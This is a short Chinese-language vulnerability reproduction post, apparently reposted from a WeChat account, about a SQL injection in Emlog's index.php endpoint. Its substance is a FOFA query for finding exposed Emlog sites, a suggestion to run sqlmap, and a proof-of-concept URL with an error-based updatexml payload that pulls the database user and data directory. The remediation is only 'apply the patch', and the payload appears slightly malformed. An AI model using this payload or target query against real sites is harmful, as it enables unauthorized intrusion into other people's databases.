1. Emlog 简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
Emlog
2.漏洞描述
EMLOG 是一款轻量级开源博客和CMS建站系统,速度快、省资源、易上手,适合各种规模的站点搭建。Emlog index.php接口的存在SQL注入漏洞
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
Emlog
4.fofa查询语句
app="EMLOG"
5.漏洞复现
可以跑sqlmap
6.POC&EXP
/index. php?keyword=%2527%20AND%20updatexml(1, concat(0x7e, *, 0x7e, user (), 0x7e, @@datadir), 1)%20%20--%2520
7.整改意见
打补丁
原文始发于微信公众号(南风漏洞复现文库):Emlog index.php接口的存在SQL注入漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论